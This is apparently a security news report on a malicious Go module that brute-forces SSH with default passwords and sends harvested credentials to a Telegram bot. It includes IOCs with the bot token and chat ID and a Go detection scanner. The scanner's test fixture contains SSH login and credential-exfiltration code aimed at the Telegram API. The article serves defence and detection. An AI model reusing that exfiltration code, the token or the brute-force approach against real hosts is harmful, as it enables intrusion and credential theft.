Telegram-Linked Go Module Turns into High-Speed SSH Brute-Force Tool, Steals Credentials

Socket’s Threat Research Team has uncovered a sophisticated supply chain attack targeting cybersecurity professionals through a malicious Go module package called golang-random-ip-ssh-bruteforce.

Masquerading as a legitimate SSH brute-force testing tool, the package secretly exfiltrates successful login credentials to a Russian-speaking threat actor via Telegram, effectively turning users into unwitting credential harvesters for cybercriminal operations.

Technical Architecture of the Credential Harvester

The malicious package operates through a carefully engineered infinite loop that generates random IPv4 addresses and probes TCP port 22 for accessible SSH services.

Figure. Left: Telegram Bot Info confirms the exfiltration bot is active: name ssh_bot, username @sshZXC_bot. Right: Telegram User Info confirms the active destination account: user Gett, username @io_ping, which maps to chat_id 1159678884.

Upon discovering an open port, the tool launches concurrent SSH authentication attempts using a hardcoded wordlist containing common default credentials.

The package deliberately disables host key verification by setting HostKeyCallback: ssh.InsecureIgnoreHostKey(), so the client accepts whatever host key a server presents and will connect to any SSH server without validating its identity.

The embedded wordlist strategically targets IoT devices and hastily configured systems, pairing the usernames root and admin with weak passwords such as raspberry, dietpi and alpine, and common sequences like 123456.

This approach indicates systematic targeting of exposed SSH services on small servers, single-board computers, and network appliances where default credentials often persist.

Upon the first successful authentication, the package immediately exfiltrates the compromised credentials to a hardcoded Telegram bot endpoint: https://api.telegram.org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage.

The stolen data, formatted as IP:username:password, is transmitted to chat ID 1159678884, which is controlled by the threat actor.

Russian-Speaking Threat Actor and Operational Impact

The package was published on June 24, 2022, by the GitHub user IllDieAnyway (alias G3TT), whom Socket assesses with high confidence to be a Russian-speaking threat actor.


This assessment is based on extensive Russian-language content across the actor’s repositories and VKontakte-specific tooling. The threat actor maintains additional offensive tools, including a C2 framework called Selica-C2, suggesting capabilities for building SSH-compromised botnets.

The operational strategy is particularly insidious: by distributing the workload across unwitting operators, the threat actor avoids direct legal exposure while collecting high-value SSH credentials.

Each successful breach provides immediate access credentials that can be leveraged for lateral movement, payload deployment, or sold on criminal marketplaces.

Socket recommends treating all offensive utilities from untrusted sources as potentially hostile, implementing strict egress controls for messaging APIs, and deploying detection rules for Telegram Bot API references and the specific ssh.InsecureIgnoreHostKey() pattern.
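The following is an added example, not Socket’s tooling and not code from the malicious package, showing what a minimal detection rule for the two constructs described above looks like in practice: the ssh.InsecureIgnoreHostKey() host key callback and a hardcoded api.telegram.org/bot<id>:<token> URL. It parses a Go source file with the standard library go/parser and walks the AST, so it does not need the module to build. The fixture it scans is constructed for this example and uses placeholder bot id, token and chat_id values rather than the real IOCs.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"regexp"
	"strconv"
)

// Finding is one suspicious construct located in a Go source file.
type Finding struct {
	Kind string // "insecure-hostkey" or "telegram-bot-api"
	Line int
	Text string
}

// telegramBotRe matches the Bot API URL shape from the IOC:
// api.telegram.org/bot<numeric bot id>:<token>. The token is kept in the
// match so an analyst can pivot on it (getMe lookup, abuse report).
var telegramBotRe = regexp.MustCompile(`api\.telegram\.org/bot[0-9]+:[A-Za-z0-9_-]+`)

// ScanGoSource parses one Go file and reports calls to
// ssh.InsecureIgnoreHostKey and string literals embedding a Telegram
// Bot API URL. It is a purely syntactic check (no type information),
// so an aliased import of golang.org/x/crypto/ssh would evade rule one.
func ScanGoSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var out []Finding
	ast.Inspect(f, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.CallExpr:
			sel, ok := x.Fun.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			if pkg, ok := sel.X.(*ast.Ident); ok && pkg.Name == "ssh" && sel.Sel.Name == "InsecureIgnoreHostKey" {
				out = append(out, Finding{Kind: "insecure-hostkey", Line: fset.Position(x.Pos()).Line, Text: "ssh.InsecureIgnoreHostKey()"})
			}
		case *ast.BasicLit:
			if x.Kind != token.STRING {
				return true
			}
			// Unquote handles both "..." and raw `...` literals.
			if s, err := strconv.Unquote(x.Value); err == nil {
				if m := telegramBotRe.FindString(s); m != "" {
					out = append(out, Finding{Kind: "telegram-bot-api", Line: fset.Position(x.Pos()).Line, Text: m})
				}
			}
		}
		return true
	})
	return out, nil
}

// sampleSource is a constructed fixture mirroring the two constructs the
// article describes; bot id, token and chat_id are placeholders, not IOCs.
const sampleSource = `package main

import (
	"net/http"
	"golang.org/x/crypto/ssh"
)

func tryLogin(ip, user, pass string) bool {
	cfg := &ssh.ClientConfig{
		User:            user,
		Auth:            []ssh.AuthMethod{ssh.Password(pass)},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(), // accept any host key
	}
	_, err := ssh.Dial("tcp", ip+":22", cfg)
	return err == nil
}

func report(ip, user, pass string) {
	// placeholder bot id, token and chat_id, not the real IOC
	url := "https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendMessage"
	http.Get(url + "?chat_id=0&text=" + ip + ":" + user + ":" + pass)
}
`

func main() {
	findings, err := ScanGoSource("sample.go", sampleSource)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("sample.go:%d %s %s\n", f.Line, f.Kind, f.Text)
	}
}
```

In practice you would run ScanGoSource over every .go file under the module cache (GOPATH/pkg/mod) or in a vendor directory before building, and treat either finding as a blocker for anything that is not an explicitly reviewed offensive tool. The AST rule is stronger than a grep because it ignores comments and is insensitive to whitespace, but it is still syntactic: an aliased or dot-imported ssh package, or a token assembled from pieces at runtime, will slip past it, which is why the article pairs source detection with egress controls on the messaging API itself.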

The malicious package remains active on both GitHub and Go Module platforms at the time of writing, despite Socket’s removal requests.

Indicators of Compromise (IOCs)

Malicious Go Package

  • golang-random-ip-ssh-bruteforce

Threat Actor’s Alias and GitHub

  • IllDieAnyway
  • https://github[.]com/IllDieAnyway

Exfiltration Endpoint

  • https://api[.]telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884&parse_mode=HTML&text=<code>


The post Telegram-Linked Go Module Turns into High-Speed SSH Brute-Force Tool, Steals Credentials appeared first on Cyber Security News.

